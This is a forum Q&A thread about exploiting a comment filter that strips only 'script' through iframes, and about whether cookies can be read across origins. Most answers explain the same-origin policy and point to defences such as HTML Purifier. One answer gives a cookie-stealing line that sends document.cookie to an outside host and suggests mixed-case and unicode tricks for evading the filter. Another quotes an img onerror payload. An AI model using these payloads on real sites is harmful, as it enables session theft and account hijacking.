# cross site scripting with Iframe

Tags: javascript, iframe, xss

I am experimenting with cross site scripting. I have a website which allows users to insert comments and view them on the website. The website filters the string "script" though from the comment but it allows iframes. I understand that I could embed an iframe that points to a website that I craft and I can run whatever script I wish. My question is: will my iframe script be able to read cookies initiated by the original website? I have tried alert(document.cookie) but it shows an alert with nothing in it. The original website always sets a cookie though when a client requests it. Any idea what I am missing?

Comment: To access a parent page from an iframe (both pages on the same doimain), use the `parent` object, e.g. `parent.document.cookie`

Answer (score 11, accepted):

Both the surrounding page need to come from the same domain. This is limited by the Same Origin Policy, which states that a script in one frame may only access data in another frame given they are on the same protocol, have the exact same domain name and are running on the same port. It can be slightly relaxed by setting document.domain to the top level domain in both frames, and thus allowing frames from subdomain to communicate.

You could though try to input , though that may be blocked in newer browsers.

Limiting script is however not enough to stop XSS. There are many many other ways. See http://html5sec.org and http://ha.ckers.org/xss.html

Comment: If I understand correctly, it is the matter of the child iframe to set the document.domain, isn’t it ? *(since doing it in the parent document returns a network error)*

Answer (score 4):

You made it sound like you are trying to use the cookie as a payload for the XSS?

Are you in fact trying to steal the cookie?

But if the site is allowing you to insert comments and only removing "script" then you have a bunch of alternatives for inserting XSS including coookie stealing script.

Try this

```
javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;
```

but you want to encode the word script so you can instead you can try

ScRiPt

or unicode `73 63 72 69 70 74`

Answer (score 1):

Cookies follow same origin policy.  So if the attack website and the victim website(which allows iframes to open) are having the same host  then the popup on running  document.cookie  will conatin the cookies info.
Since in  your case  they  seem  to  be  of diff domains  cookie  stealing will not be possible.
To prevent XSS  better way is  to use C:out  tag of the core jstl library

Answer (score 0):

As far as I know, an iframe cannot access to the original website if the domain of iframe and the domain of original website are different, but there are [other problems](http://ha.ckers.org/xss.html). (ex. cracker commenting `<img src="asdf" onerror="alert(document.cookie)"/>`)

You may want to use somethings like [HTML Purifier](http://htmlpurifier.org/)....